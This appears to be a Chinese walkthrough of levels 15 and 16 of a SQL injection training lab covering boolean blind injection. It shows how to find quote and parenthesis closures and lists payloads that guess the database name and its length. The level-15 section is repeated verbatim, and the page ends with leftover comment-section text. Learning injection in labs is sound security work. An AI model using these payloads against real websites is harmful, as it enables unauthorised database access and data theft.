第十五关(布尔盲注)
1.判断注入类型
使用1 or 1=1 和 1 or 1=2发现页面正常。
1 or 1=1

1 or 1=2

输入1’发现并没有报错,输入1"发现也没有报错。
1'

1"

这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
2.查询数据库名称
1' and ascii(substr((database()),1,1))=115#
1.判断注入类型
使用1 or 1=1 和 1 or 1=2发现页面正常。
1 or 1=1

1 or 1=2

输入1’发现并没有报错,输入1"发现也没有报错。
1'

1"

这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
2.查询数据库名称
1' and ascii(substr((database()),1,1))=115#
第十六关(布尔盲注)
1.查看本关源码

通过源码可以猜测本关的闭合方式为 ")
2.判断注入点
1") or 1=1#

1") or 1=2#

可以进一步验证注入点为 ")
3.猜数据库长度
1") or length(database())>7#

6529

被折叠的 条评论
为什么被折叠?



